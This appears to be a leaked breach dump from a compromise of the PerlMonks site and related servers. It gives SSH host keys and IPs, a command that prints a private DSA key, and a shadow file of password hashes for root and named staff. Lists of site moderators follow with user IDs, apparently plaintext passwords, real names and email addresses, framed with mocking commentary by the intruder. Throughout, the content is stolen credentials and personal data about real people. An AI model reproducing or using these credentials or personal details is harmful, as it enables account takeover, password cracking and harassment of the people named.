F4VJb8runfWWMEFtSQTHZKudRvpUl3t/lPxTGhXAY/DDpT6Yjos4BEb3IDaswMHIzgGIKnzyaSx/o6N
GDpccp1/HyHKvo5GnsEX6+tOv87MfkkQXpAAAAFQCqifFFt+JI1iy4JssD37Dgl8q2wwAAAIAYjkMzC
4EErQ5hQbVfDMgEvzxmkA85kq9sbV2NqMPblTltYTdS0Oax/K3OSLXoZ2n1I2stwwkLoeDLaJk1nH0Z
3dRpD8cIsbLD5xXDXDIOJiyh87rLfS8XJwfnxGCGJhhJMbb08fIRg/bevIEOI9IaLRj9PNCsumYZ0Mv
KWVGFOwAAAIBcSCQpijoqtfVXVoY29fY+0G7VtBjabZ9ghX5Gqy490ik0lepTL+c3vIoMb71OgTnfJb
A/WP/Pz9jP25Ui6azLN1Y3tXLPIFtAex+TI4ub6ntQAB1lulz+ETuqLrL+h2jUaDsec+UhlS0FDdRS8
+1yiE88A6TLgXDU3sihPB2Arg==
runts.dreamhost.com,208.113.138.13 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEApMr6cEY236fOHLpAnJ/iMjksHNSbPoQwC6/pcr9RVvIEpjSw/oh
tS3XzCAgt4orh/XslpktpQVvkPFeDFsvGscTRj82EI3fMMYyycU6Qr5WxyfIC49NQwPPLoZUp5adfVr
560B2pfcsdi+WoHT0ZlQd9ufCtVescPML8PkBT/X0=
catfish.blockstackers.com,35.8.188.144 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEApwbZpKppt/M08Kr87awXM8rJoJvGblebWpUHPQed6BsM/6FL8uu
gycqTM2tlkN5SosUFg43vl7cf1ZIWQUe2kTslnhUW5viEDqkjRQafzP4I5UsDH8M5fXGDzHwNbBcZpn
xjFO4eVkjeAB4LXyBKReFyAXr5tiPXtIuxXf13L4OqvOfFAs84tntJ5mZO61Cr8O6UEo0JYTFCZf9SK
IfoTCD4XLJIaTf+Hxm4WekjhodfLFnPrZ0vc3LrTszp0ph3ZsQB04mxOm5/Wnoi4CJ40ijUgEc0oy8R
aMg51QnAwqkIqh24AYqQXKWsEHTzCDdGSEyTQ6a6vTV/WJaHzi2Nyw==
zeno.si.umich.edu,141.211.185.181 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA26+zmzhtEebiUhH6LPbv1hOq5p2GgwZMyQbAZ2BQz8h2J+eREHL
rII5C8w77J5oznYjDajn+cb/e0jqcvGy97cLw08R2zZFEXgQkzJfNWWZZnIvu97wSpgLKTVnpzA2r7V
MP7crb2NYzPQj1osVYtsFWC2B6q6E1CQwTZtlm5zaVVYfLUgf8r43OMa9uhHkFNXI1gfUBIiN8lDlGU
ljefGF1QPGmXcgwU+uxiqfCHXuSUcnBl6Nh+MCNIVQTXYulUV6nichj+A0RR13FEGPVkUnn0fcS02Lr
Z6LgCf11nLCrz96mf/A3uVCTmvUjOaSlvMVUmjjihpa/n5VrJrVVVQ==
qs1968,216.92.2.218 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAu8dzZ+cKbw+EzFZjQ86cyO2JWBvEqWNOCCEfroxEC00hxKKlPXT
CM4op7WCnHdd6WxBNsWkHqH6osoTvXL4gZ8Gra8xT1RHzhrn9S+zJJ/3O50Muqc1ueVSHNyozEjHuVh
2DOB1zF13eU5dV+vH5h6skdHVr79nE40ujKztlLufcMqfL3UCAPqqiDtZJEgZXIcQmm/PSyW8qtSysv
KGdPPzDxVn9T6PjV2lDG/ehvPkRIM3NRVzYu2LxvR9eBeGRzMmXPvVUv6ePRDIc06S4d+p61n2/FHJM
Fgk9AibY5Z8q1HT61ZZ2RzsZw7TFwk7YO/ZoEAzxe6KT7WM4xFTC8Q==
%cat .ssh/id_dsa
-----BEGIN DSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,7B44F38D3D2524FA

h5uyq9t/oR7ERld7jn1ijwRbmFP1eALWXclZxuOpZsaOemcD1Z4ym0CUA0jXjLAt
0y3EBdnfmsCym+BbsAdvqADxr60HoMqpuMFwNvCAXxBKKGCDS1YsRUOIX9nZm9Au
EwbtpZrCYxuaHAgyr5TccB3wYFwAeMOx8UK4urCoqQPQv0ZoO7AOct7IZ7oJwSv7
8WGpY4SK8Gz3fMnxTVkw5K9YgiuqzaEzIiKjsFm1n6Bq8iJulwqlSAeFishXERTt
oVj+Y9fbgu7ET38vdjoXfx2BMM2Dh484qXWSjauY03CoiCaDk79HJNvohsqdYha+
DDnIq2Dlribon3pg8y/EIrTd0AZe9vovqqOWR/hmrUJqpSBmkrGZTp2pFW1LhFjb
/PlkyDkvFZ+Y7+ORjVjnqxJk5x4+DCZEJD8ExI2tQMTcl6OusLftfoJ82cKYdpGT
RXEEnBDiImUseFlWRyCSingSsh8K0D/zJiaSNpZrBq74fKEkPtVrSxssGGes5yOZ
NcgSmUOmUkth7b2tRgJChfFVGxmRYHRDAHwBVuEmIynypmfbmY53q7RQvrBywt/A
W4OTQVAUgfRZOYqtKTqvX20vv6RKFC4n
-----END DSA PRIVATE KEY-----

Did you guys see the root vulnerability there? In case you missed it, here's
the shadow:

root:$1$GdIok1Pz$xRKigk3/kV4Xji4pdeLXH1:0:0::0:0:Super User:/root:/bin/csh
rootsh:$1$pXvXZptn$8b/secUoKU6e6YD7RqhhQ1:0:0::0:0:Super User
Bourne:/root:/bin/sh
aharrod:$1$47msZ$mZzsUeC8oS3KHG75Fx40r/:1050:20::0:0:aharrod:/usr/home/staff/ah
arrod:/usr/local/bin/tcsh
alan:$1$1t1zZKAo$p4VNj7DN7gtBI2sFcyjqK1:1037:20::0:0:alan:/usr/home/staff/alan:
/usr/local/bin/zsh
amg3320:$1$lwsMJvfW$ieighLBJQ7DVxTXsmL8O8.:1089:20::0:0:Anthony M.
Giannotti:/usr/home/staff/amg3320:/bin/csh
blich:$1$DNAlO$hMCT0uOOlyds.Jm6M6lMp/:1061:20::0:0:blich:/usr/home/staff/blich:
/usr/local/bin/tcsh
bmc1:$1$SwA/lq9D$zBadeDMtKGn6P5QJ20UJ10:1084:20::0:0:Bruce
Cromwell:/usr/home/staff/bmc1:/usr/local/bin/tcsh
brooksa:$1$JEFG2EaV$iBpm4itTLMxn8b779cDDu.:1090:20::0:0:Arden
Brooks:/usr/home/staff/brooksa:/bin/csh
cap:$1$PlGbA$u.WbC1YQh8.GEDmXj0Ha60:1012:20::0:0:cap:/usr/home/staff/cap:/usr/l
ocal/bin/tcsh
cbeck:$1$pXrw1WsU$JbpGFBVNLMu60BPeSSj5w0:1121:20::0:0:Charles
Beck:/usr/home/staff/cbeck:/bin/csh
cwest:$1$iBhg.$f55ffvQTzZBwRf8y.4OoU1:1055:20::0:0:cwest:/usr/home/staff/cwest:
/usr/local/bin/tcsh
dalgaard:$1$/YOJFKKq$631Ok2RiN0969SUvkZO7z/:1099:20::0:0:Curt
Dalgaard:/usr/home/staff/dalgaard:/bin/csh
danw:$1$Hdn9J3GA$VOAaZNkbJyA2mwI0.1HhJ.:1073:20::0:0:Dan
Wyrostek:/usr/home/staff/danw:/usr/local/bin/zsh
djansel:$1$JoSW33YK$E3xYIpoDc.H8uuFZkP8ka0:1103:20::0:0:Dorrie
Ansel:/usr/home/staff/djansel:/bin/csh
elizabet:$1$uyJibP4g$HyzVzdOyMxDOLHkuMro5H1:1024:20::0:0:Elizabeth
Cromwell:/usr/home/staff/elizabet:/bin/tcsh
erich:$1$UQ2Ov4SA$Usoo3MJMrJK7nSwHIkA0//:1074:20::0:0:Eric
Howard:/usr/home/staff/erich:/bin/csh
erik5:$1$c4O1xkdF$h0/j0CJdKVNP0T/41LWsf1:1038:20::0:0:erik5:/usr/home/staff/eri
k5:/bin/sh
ewing:$1$gnhKDbSe$uw/KU80BD8b.eQ5FqAxXo/:1114:20::0:0:Stephanie
Ewing:/usr/home/staff/ewing:/bin/csh
fresem:$1$Q31CDNsF$Ta7wUf9/CBhD98eBF0V9l.:1130:20::0:0:Mark
Frese:/usr/home/staff/fresem:/bin/csh
garyh:$1$isnpTcPI$S8KopDIAG5PAC9t6J9g5l.:1068:20::0:0:garyh:/usr/home/staff/gar
yh:/usr/local/bin/tcsh
gk:$1$Y3CKV$Iy36wsGAiMdgoIzr60iDc.:1007:20::0:0:Gus
Kumpfmiller:/usr/home/staff/gk:/bin/csh
haluskag:$1$f8.glv0J$MSNfy4DIZrqOx/EqZnfXf/:1124:20::0:0:Garrett
Haluska:/usr/home/staff/haluskag:/bin/csh
hawn41:$1$DnV6/u/h$aK/S18iOJV6EjsHD.K2cQ1:1115:20::0:0:Christopher
Hawn:/usr/home/staff/hawn41:/bin/csh
hmcs:$1$.ix2OLb.$wamqPNlEG7Z5cRbnZZloB.:1132:20::0:0:Sam
Raley:/usr/home/staff/hmcs:/bin/csh
hrudmin:$1$BULLY4lM$RYsTvkBmmjlzprQ4TyKfi1:1122:20::0:0:Hans
Rudmin:/usr/home/staff/hrudmin:/bin/csh
iceolate:$1$PISPBhZ0$RcXiNIhrRHPH9vFGJr2LM/:1126:20::0:0:Bill
Causer:/usr/home/staff/iceolate:/bin/csh
itpolas:$1$C5t2sLCa$XLl5o0NcnnnJnz6GwSFR9/:1127:20::0:0:Ivan
Polaski:/usr/home/staff/itpolas:/bin/csh
jcaino:$1$.p/BKOuE$sHw4cDE1RHPFhpQ0i4raH.:1105:20::0:0:Jonathan M.
Cain:/usr/home/staff/jcaino:/bin/csh
jdavis24:$1$jV8w195S$33xLF9nmwTzcr0JmTbCJ1.:1101:20::0:0:Josh
Davis:/usr/home/staff/jdavis24:/bin/csh
jeberley:$1$JFAxTYri$.QsNKPzumrU/Dmk5yXd9y0:1131:20::0:0:Jaime
Eberley:/usr/home/staff/jeberley
jwr:$1$XiNLH8fh$dWmLbpqt0arM7xkUen9x31:1116:20::0:0:John
Robison:/usr/home/staff/jwr:/bin/csh
kettell:$1$Lchiqs7j$alh86yk/LNbVriOyUFS7/.:1081:20::0:0:Brian
Kettell:/usr/home/staff/kettell:/bin/csh
kevino:$1$mPQfc2aB$JLihi34NuRIS1.EdKfawZ0:1070:20::0:0:Kevin
O'Connor:/usr/home/staff/kevino:/bin/csh
koco:$1$CFuJwP8p$Qg847JynFAhl8BqIJwhki1:1133:20::0:0:Krystal
O'Connor:/usr/home/staff/koco:/bin/csh
ktesche:$1$/1ApBO9x$tuZP5quU3md5hw2x/mrOv1:1112:20::0:0:Kurt
Tesche:/usr/home/staff/ktesche:/bin/tcsh
kurt:$1$sXAOTFM8$OK0lKX3x0UW0WYhJMVtwY/:3003:1000::0:0:kurt:/usr/home/kurt:/bin
/csh
kvferry:$1$nQor/gT.$38jGkQ3BEzFICNxpMylT1.:1097:20::0:0:Keith
Ferry:/usr/home/staff/kvferry:/bin/csh
matt:$1$8npes$NhB9vhI8U4rK7MOYyTz0V/:1006:20::0:0:Matt
Riffle:/usr/home/staff/matt:/usr/local/bin/tcsh
mddst34:$1$r5Xpg6Xd$WV/6kzqvuMlygdFWrSR/n1:1072:20::0:0:Matthew
Dalessandro:/usr/home/staff/mddst34:/bin/csh
megana:$1$alL4WTE0$r33t0WWfcvyjK/8mfgoHq.:1067:20::0:0:megana:/usr/home/staff/m
egana:/usr/local/bin/tcsh
melea:$1$O7KCX$GJrGsNAIEjyc0oV0fd7Xh0:1029:20::0:0:melea:/usr/home/staff/melea:
/usr/local/bin/zsh
mlehner:$1$yqGt.$nPAWpXeojlNDR2wl7UTit/:1039:20::0:0:mlehner:/usr/home/staff/ml
ehner:/bin/csh
perlmonk:$1$bvxWkDNR$lT1pXGcnrvPsM4ac1ul210:3002:1000::0:0:Kurt
DeMaagd:/usr/home/perlmonk:/bin/csh
pfawcett:$1$y3peZ$yZmPIMsRZeLLX6EkpCJTc.:1057:20::0:0:pfawcett:/usr/home/staff/
pfawcett:/usr/local/bin/tcsh
pjmclaug:$1$j1C8A$SHvZzel7HRllWOSjWMLoC1:1032:20::0:0:pjmclaug:/usr/home/staff/
pjmclaug:/bin/csh
pweigle:$1$yFqXWpqo$nNakkTyw71X9fs6.va9Vp1:1108:20::0:0:Patrick
Weigle:/usr/home/staff/pweigle:/bin/csh
rbroo25:$1$jxq6Sfim$pPqf45eop3Q3ZIyt1VkQQ.:1125:20::0:0:Ross
Brooks:/usr/home/staff/rbroo25:/bin/csh
rcd:$1$5SPkQktf$6Zh/9PMPi8dxUQv0PnYuv1:1019:20::0:0:Rob
D:/usr/home/staff/rcd:/bin/csh
rsilb:$1$nUiZ2QOJ$jS.xKzEuZU3v0xyiUQlh71:1117:20::0:0:Ryan
Silbaugh:/usr/home/staff/rsilb:/bin/csh
rwebb:$1$pQ4yeTyS$JUJodEoplNH59pp979nGQ/:1100:20::0:0:Rhonda
Webb:/usr/home/staff/rwebb:/bin/csh
ryans:$1$MgBmhot8$b9b1SIdrzEUdzVuz3QpcI1:1109:20::0:0:Ryan
Smaretsky:/usr/home/staff/ryans:/bin/csh
sigma:$1$Ny73G$zYjhZCcyC1oUsl/TX9.FN1:1000:20::0:0:Kevin
Martin:/usr/home/staff/sigma:/bin/csh
smk:$1$u1MlBIs0$6lB1SOHM0g4eF6GzfF7bN.:1083:20::0:0:Scott
Kriebel:/usr/home/staff/smk:/usr/local/bin/tcsh
sxpst1:$1$T6u5J0dc$V77gQSVBb9tfepYWeb/e0.:1045:20::0:0:sxpst1:/usr/home/staff/s
xpst1:/usr/local/bin/tcsh
terram:$1$gkxiCJOG$mdvrBqBQ8WqMJokLZI7jJ0:1054:20::0:0:terram:/usr/home/staff/t

And now for passes. I was too lazy to add usernames, but you have a uid you can
check on the site, along with real names and email addresses given here.

First, the janitors:

5348        a5q!po9            Max Maischein                  corion@corion.net
22609       ij7dIcmy              Tye McQueen         nothingisobvious@gmail.com
25626        4131466           Gryphon Shafer                   gryphon@cpan.org
47040       13GsYTBp                    chady                    chady@chady.net
299049       6fCA24EY  Yitzchak Scott-Thoennes                   sthoenna@efn.org
108447       p3rlp3rl               Yves Orton                 demerphq@gmail.com
281137        Coimbra             David Oswald                 daoswald@gmail.com
298378         nalini              Arun Persad                 arunbear@gmail.com
421540          p1x1e         Charles Colbourn              charlesc@colbourn.net
442602       7po5bu2k         Nancy Noell Burk   nancy@planetscapeenterprises.com
461912        william           Peter Jaquiery                    peter@adi.co.nz
221638        131.Nem            Jess Robinson       castaway@desert-island.me.uk
483556       tssg5748                   Darren              darren@victoriajd.com

And now the list of saints:

979       Volma379                Tim Vroom            vroom@blockstackers.com
171588       adv59416           Nigel Sandever           vev6s4702@sneakemail.com
381608       archforc                      ELB                ikegami@adaelis.com
9073       4p3rlm0n       Randal L. Schwartz     merlyn.perlmonk@stonehenge.com
5348        a5q!po9            Max Maischein                  corion@corion.net
17000       pineappl               Curtis Poe          curtis_ovid_poe@yahoo.com
85580         kieran               Rob Kinyon               rob.kinyon@gmail.com
22609       ij7dIcmy              Tye McQueen         nothingisobvious@gmail.com
26179       rtkJhiG2                Ben Tilly                   btilly@gmail.com
82147       bZ9jFSgN                Tom Leete            tleete@zoominternet.net
1382         p3rlm0                chromatic                  chromatic@wgz.org
461912        william           Peter Jaquiery                    peter@adi.co.nz
29008       MonkEBiz           david landgren                 david@landgren.net
169744       EahejY7f                  Abigail                   abigail@foad.org
22308       davesmit               Dave Smith                 dws@davewsmith.com
131741       8jYcEZ4T              joe milosch                zentara@zentara.net
18800         3mta3U            Jeff Anderson             captvanhalen@yahoo.com
104919         emma96           Perrin Harkins                    perrin@elem.com
114691        rj1ophh      Aristotle Pagaltzis                   pagaltzis@gmx.de
2680        hal9000               Dave Cross                   dave@dave.org.uk
58196       496JGGW2            Mike Fletcher          fletch+pmonk@phydeaux.org
180961       G@tcomb1                   Joshua       Limbic_Region_2000@Yahoo.com
366986        top1dog              brian d foy                     bdfoy@cpan.org
80749          Jade9         Dr James Freeman        jamesfreeman404@hotmail.com
186362        TimPMp.                  adrianh             adrianh@quietstars.com
108447       p3rlp3rl               Yves Orton                 demerphq@gmail.com
616540       J5FZPUa5              Moritz Lenz                 moritz@faui2k3.org
281137        Coimbra             David Oswald                 daoswald@gmail.com
1936       lekke112              Jeff Pinyan                japhy.734@gmail.com
157432       f8AcbUfG         Joost Diepenmaat                   joodie@xs4all.nl
123953         billa1           Martin Fabiani                 martin@fabiani.net
44715       rNlwU0zq              David Graff                graff@ldc.upenn.edu
194920       kladdOrf                    JJORE                     jjore@cpan.org
224409       trustno1            Boris Zentner                       boris@2bz.de
21156       7iFND7RI           Thomas Stanley           Thomas_J_Stanley@msn.com
409850       zip9mreq            Michele Dondi              blazar@lcm.mi.infn.it
299049       6fCA24EY  Yitzchak Scott-Thoennes                   sthoenna@efn.org
190859       BJ4Y56VW              Bart Lateur             bart.lateur@pandora.be
211692       whatever                                                            
510280       gell/fei             Georg Moritz                        gm@cruft.de
57126        gandalf            Hugh S. Myers               hsmyers@sdragons.com
290905       Bear*Dog              Bob Goolsby              bob.goolsby@gmail.com
9346       lc5ctIR1         Michel Rodriguez                  mirod@xmltwig.com
198160        seawolf               Karl Moens              karl.moens@telenet.be
421114       thet0wer            Darin McBride              dmcbride@naboo.to.org
57097         slayer          Jeffery Schmitz             jefferyschmitz@mac.com
107642       Mma$5t3R           crazyinsomniac           crazyinsomniac@yahoo.com
132236        potstal              J. Waalboer                 perlmonks@juerd.nl
127116       ate27aq1           Giuseppe Maxia                  g.maxia@gmail.com
585085       monadriv        Kyle Hasselbacher                   kyleha@gmail.com
87452       greenosc                Dan Brook                broquaint@gmail.com
131279        tab44pm          T. Alex Beamish                   talexb@gmail.com
118343         klunky             Edward Perry                yuckfoo@kscable.com
170442         4quan3      John Douglas Porter              johndporter@yahoo.com
25626        4131466           Gryphon Shafer                   gryphon@cpan.org
159343       bluefour               Sam Tregar                     sam@tregar.com
442602       7po5bu2k         Nancy Noell Burk   nancy@planetscapeenterprises.com
324763         t1nman                   Martin           mcgrath.martin@gmail.com
352046       88WWster             walt wheeler             wheelerw@fairpoint.net
368189       fish4tea              john sharpe                wfsp@btinternet.com
182681        court17                    sauoq                    sauoq@yahoo.com
195718        wfBFxTd              Timm Murray           hardburn@wumpus-cave.net
146981       kOQZckf3              Dave Turner                      drt@sonic.net
65703       drowssap                      Rob                     robau@cpan.org
176576       knob6352            Andrew Savige                   asavige@cpan.org
16260       apelsinp          Johan Lindström               johanl@DarSerMan.com
326529       trustno1              fred@2bz.de                        fred@2bz.de
33117         npwimi                                         footpad@biocede.com
155876       ack9aRRo         Matthew Musgrove                 mmusgrove@cpan.org
268515          aj360             David Golden                  dagolden@cpan.org
465654       anjinsan           John C. Norton              jchnorton@verizon.net
144850       Proactiv            Ivor Williams                 wizzard@xemaps.com
237051       kA6MYfUU               Marc Beyer                   japh@tirwhan.org
31503       VByMLNYa           Douglas Wilson          douglasg.wilson@gmail.com
300037        chicken              Roy Johnson                 rjohnson@shell.com
277846       Re1sc0kR             Richard Rose             richard.58@bigpond.com
580097       aert44dc            Almut Behrens              almut-behrens@gmx.net
8930       flow2eve               mike barry                     mbarry@cos.com
45414          gkl74            John McNamara                 jmcnamara@cpan.org
83485        87super              Blake Mills        blakem-perlmonks@blakem.com
483556       tssg5748                   Darren              darren@victoriajd.com
72267        pmvahe1          Vahe Sarkissian                 vsarkiss@pobox.com
295576       4tragbar             Zsban Ambrus                 ambrus@math.bme.hu
166227       bertossi          Valerio Paolini             valdez@linuxasylum.net
611550         ma3sch         Brian Greenfield                 0briang0@gmail.com
133383         tofuji          Christian Brink                 grep.pdx@gmail.com
80322       cUk34CJ3          John M. Dlugosz             jdlugosz@securenym.net
187037       sm0kesta           Richard Burton                      tbone1@io.com
145001       78R3SWIE               Mark Kvale                 kvale@phy.ucsf.edu
104238       f1shcake           Jonathan Stowe                  jns@gellyfish.com
53423       ?yruw#R3        Michael K. Neylon           mneylon-pm@masemware.com
2698       LangByBa             David Vergin                    dvergin@igc.org
9547       hopsmack                Matt Sisk                  sisk@mojotoad.com
248054       kJaec8dK               Troy Gains                      troy@rmdb.net
160333        mvgeat7                     dree                                   
167085       YJNaKZTI                                         gawatkins@yahoo.com
272239         wh00p1      Elizabeth Mattijsen                     liz@dijkmat.nl
149104         spruc3                     Gary                 gary@logicwest.com
241598       seifenop            Markus Holzer                holli.holzer@web.de
137386        dorash7             Mike Rosulek                rosulek@fastmail.fm
315586         yelllo            Stevan Little     stevan.little@iinteractive.com
524150       98ZRDYiH              Rob Gilmour          sisyphus1@optusnet.com.au
105128       seznamka           Jenda Krynicky                  Jenda@Krynicky.cz
245082       blah.bla          David Westbrook               dwestbrook@gmail.com
25047       wakkawak            James Mastros                  james@mastros.biz
439528         carajo    Gabriel B&eacute;rriz                  gberriz@gmail.com
95145       froglove               Matt Olson                  mjolson@cs.sfu.ca
70929       CTScts17                 A. Croft            acroft@cyber-wizard.com
139958         sinny2            Mike Friedman                  friedo@friedo.com
375665       bob23mon          Robert Freimuth        freimuth.robert@sigmaxi.net
16186        assc51w              Paul Miller                   jettero@cpan.org
9270       smelt666               J. C. Wren                  jcwren@jcwren.com
119620       vek45699            Kevin Spencer              kev.spencer@gmail.com
401112       iEfeM9ke             john gillman         john.gillman@logicacmg.com
249603       Insecure                Ed Halley                       ed@halley.cc
4677       linbor77          Stephen Jenkins               Steve.Jenkins@nrc.ca
266955         flooby                 John Day           johnday@wordsnimages.com
10277       ~1e^edA0                                   crazyinsomniac@yahoo.com.
77866       fnordboy           anders pearson                anders@columbia.edu
534893       khK5cXgg                    Gavin              gno@gavinoliver.co.uk
146055       japm4711S&ouml;ren M. Laird S&ouml;rries                     perl@myobj.com
14909          J3mmz                Don Royer                      dobre@cox.net
163683        codfulg                revdiablo                 revdiablo@wd39.com
62512       perlfreq     Christopher E. Stith                   cstith@gmail.com
154315           temp                   robert                                   
67275           3491              Jeff Zucker                jeff@vpservices.com
113686       phobbit1            Adam Trickett          adam.trickett@iredale.net
603247        Umberto          Allan P. Lappin                        apl@acm.org
33341       QgjuSR10             Don Cleghorn                  don@globility.com
87399       getalife             Cody Pendant        hostile.seventeen@gmail.com
190016       swg48503            Scott Gifford          sgifford@suspectclass.com
49599        2namaki             Scott Tadman                    scott@tadman.ca
622051       clew48pe            Gene Sullivan         gene.sullivan@alum.mit.edu
139399       javancc1               Peter Wise                  pete@bloodaxe.com
31548       freewind                   Jeremy             jepri@alphacomplex.org
273627         batard              Brad Cathey                                   
43546       p3rlm0nk         Ronald J Kimball           rjk-perlmonks@tamias.net
159887           opus              Vijay Anand                   vijay@calmet.com
373533       gUHd9OYE              Joe Hourcle               oneiros@annoying.org
61104       fistfuck           cLive hoLLoway               pm@cliveholloway.net
287641         MaRiA1                Roger Lee             rogerlee@cosmos.net.au
3537         hamlet             Jessie Baker                    jess@bereth.com
75719       SharkR0d             Lee Pumphret                     lp@leeland.net
109358       ibaquosa         Lawrence Sweeney              thinker@dsl.pipex.com
221638        131.Nem            Jess Robinson       castaway@desert-island.me.uk
72516       w00fw00f        Peter L. Berghold                 Peter@Berghold.Net
360010       findoutm                   prasadprasad.pushpanathan@india.thalesgroup.co
6041       pmbbalfl      Greg Sabino Mullane                  greg@turnstep.com
76537        er1c000          Eric Andreychek               eric@openthought.net
27402       stinky71            Chris Winters                 chris@cwinters.com
168548        1991cav                    Brian                    bricas@cpan.org
16034        jinkies                                                            
533863       acg52ghE                    Marco              marco.mason@gmail.com
2675        lovecat           Benjamin Trott       ben+perlmonks@stupidfool.org
123291         hossss                 Hoss Man       hossman@rescomp.berkeley.edu
153214       c48zq19j                    Katie            bioprogrammer@gmail.com
446266         cabeza         Salvador Fandino                 sfandino@yahoo.com
474411        grits4u                  kent c.                   kent@c2group.net
25235       T4GDrZCj       Stefano Rodighiero                   larsen@libero.it
151991       dfbcEODH                     Mike                   rmgiroux@acm.org
57426       >=6chars               Larry Wall                     larry@wall.org
127307       p4r4n094            Ilya Martynov                  ilya@martynov.org
24736       front242                jd porter        theeaterofsocks@hotmail.com
326280       ritaanjo              José Castro                       cog@cpan.org
8656        lorelei                Jack Holt                jack.holt@pobox.com
169829       fem8GO5p                   Junior             jormangundr@moscow.com
230012       NG5QLHGcJonadab the Unsightly One                 jonadab@bright.net
133118         laotse               Marco Lima                    mago@rio.pm.org
417993       JPWQMgXI               j. Brugman           justus.brugman@gmail.com
292373       3e4E87SN          Emmanuel Florac                     wazoox@free.fr
329777        arathea          Paul Beckingham                paul@beckingham.net
494652         yd3438               E M Culver                    culvere@acm.org
5993       0WyRMwaW    Hendrik Van Belleghem            beatnik@quickndirty.org
170000        vadoggy Courage the Cowardly Dog               vadimk@vkonovalov.ru
263384       james256                     Eric                  eric256@gmail.com
388230          P3r7!                   Lukasz                        uksza@wp.pl
72806          reena              Perl Artist               perlartist@yahoo.com
186342       ZAWAU3A6             Steve Hawtin            steve@tsort.demon.co.uk
368438       msftmsft               Gaal Yahas                    gaal@forum2.org
231445       foobarba             Jason Kohles              email@jasonkohles.com
213642         nannin    Charles David Tallman                  tallman@acsys.com
155191       ballustr                    Elian                      dan@sidhe.org
373431        fintemp              Randy Kobes               r.kobes@uwinnipeg.ca
209409        trepsyl      Hugo van der Sanden                       hv@crypt.org
10261         dorko1               Brent Shaw                    shaw@cfl.rr.com
375088       anachron           Radiant Matrix            radiantmatrix@gmail.com
95917        agatha1              Jim Longino                                   
10395         money1         Terrence Brannon               bauhaus@metaperl.com
59514       88gCEIEC           John McDermott                     jjm@jkintl.com
142528       yf4rdS9I                      cjf          fairbairn@rapidimedia.com
3737       alphabet             Mark Dominus      mjd-www-perlmonks+@plover.com
104914           meep           Joseph F. Ryan                580ryan@erienet.net
84630        cymraeg           David Cantrell              david@cantrell.org.uk
23317       cTKMjBnP                     Adam                      adamc@unc.edu
394193         guvi82                gubendran              gubevijay@yahoo.co.in
468064       whodonei           Sanko Robinson              junk@penilecolada.com
63250       XTa4YRN8            Gregory Cranz                  gregor42@mail.com
43019         m0nkey      M. Simon Cavalletto              simonm@cavalletto.org
33345         $3(r37            Kanji T Bates                    bates@jurai.net
56739       ant77553             Anthony Ball                   ant_pm@suave.net
72812        desktop              Andy Lester                  andy@petdance.com
325183        pzztops             Mike Schilli               cpan@perlmeister.com
80839       G13#!ogg             Jack Challen             davis65536@yahoo.co.uk
194370       basilzen               Steve Kemp                    pm@steve.org.uk
17251         drperl                     Gary                       gary@dls.net
396583       apuleius           Thomas Hartman       thomaspazhartman@fastmail.fm
132645         v7aric        Vladimir Bogdanov                  contact@vladb.com
5403        genius*      Jonathan Scott Duff                     duff@pobox.com
16098           1734            David Nesting                    pm@fastolfe.net
70099        xyzzy42               Sue Spence                    sue@pennine.com
699288       WZGUBE8G                  JavaFan             javafan@mailinator.com
295259         1978mj                     B10m                  b10m@perlmonk.org
647878       dietcoke                       ER                 pc88mxer@gmail.com
350468         please              Avery Moore               avery@funkmonkey.com
345630       WCfgbhT3              Dan Dormont                 ddormont@gmail.com
180139       X6AZYYP9               Sean Riley               sean.riley@sxi.co.za
81749         this59             Tom Anderson                     t@tomacorp.com
3607         Mopp4f              Ray Brinzer             petruchio@perlmonk.org
89333       ak3VKHRD                  Nick Ng             nskiat_ng@yahoo.com.sg
382261       2bornot2                    Robin            robinpollard@onebox.com
32155        t097phy         James Allenspach                    jima@legnog.com
222593       Awool3Ai              Alexander O                         ccn@tut.by
228394         1hznpm        Zbigniew Lukasiak                   zzbbyy@gmail.com
420266       lynxfree             Donald Wilde                  dwilde1@gmail.com
155973         glat3b             Grant McLean                    grantm@cpan.org
128274       Eh95dL7D                   Mathew            mshember@synplicity.com
25825       laserlan              Mark Swayne                mark_swayne@mac.com
471998         shanti                Ben-David             spamtrap1@blessedb.org
73441        mad dog         Michael Houghton                  herveus@radix.net
272750       suxpmdev                 john doe                    spa5@sporty.org
169799       cIC7DaGa            Geert Jan Bex                      gjb@luc.ac.be
535734       Booger21             Steve Kirkup              Herk_Destro@yahoo.com
195379       drowssap           Michael Kellen                     idsfa@visi.com
439923        manuela           Flavio Poletti                 flavio@polettix.it
56270       76mythri            Murray Barton            murray.barton@gmail.com
85567         gpg18w                 particle     particle@artfromthemachine.com
9135        tyeb0mb                     Adam                   adam@cs.ucsb.edu
250038       regrouka           Edward Guiness               pm@edwardguiness.com
386673       perl.me.              Gavin Henry                  ghenry@perl.me.uk
304796      I\"p)0wf9                  jfroebe                            jfroebe
341121       S58WNECW            Dave Mitchell                    davem@iabyn.com
528646       K52650fx         Kevin W. Henwood                 Khen1950fx@aol.com
131494        knight_               Russ LeBar                      argel@msn.com
120013         shazam        Christopher Baker                  ignatz@cbaker.org
53200        whooper                  arhuman                arhuman@hotmail.com
228902         iomega           Jochen De Smet       jochen.perlmonks@leahnim.org
116292         carmel          Michael Peppler               mpeppler@peppler.org
95704       billybud              Will Willis             willis3140@hotmail.com
6415       Kxcm0XLo                      Ann                  ann@domaintje.com
258724        lendenu              David Jones                     djones@noos.fr
61798       bcde1234             Bernd Dulfer                  bdulfer@gmail.com
321512       FEP9CNCC               Andreas F.         andreas1234567@hotmail.com
460657       krithica               Velusamy R                samy_rio@excite.com
281009         kelsey            Steve Gilbert             gilberts@optonline.net
448370       perl1970          Rhesa Rozendaal               perl+monks@rhesa.com
34691          enema            Alex Vandiver                     alexmv@mit.edu
64906       +-redivy            Simon Proctor         webmaster@simonproctor.com
178258       yCwnPIM3                  Leaving            didier.ladner@nerim.net
31579         Waboli         Stephane Payrard                stef(at)payrard.net
5549        foobar8               Les Howard                les@lesandchris.com
173932       1234SENH  Flávio Soibelmann Glock                    fglock@pucrs.br
16711        ledzep1            David Wakeman                    djw@perldev.org
269874         sr2455         Sebastian Riedel                 sri@labs.kraih.com
141380         cul8er         Michael W Thelen                thelenm@cs.utah.edu
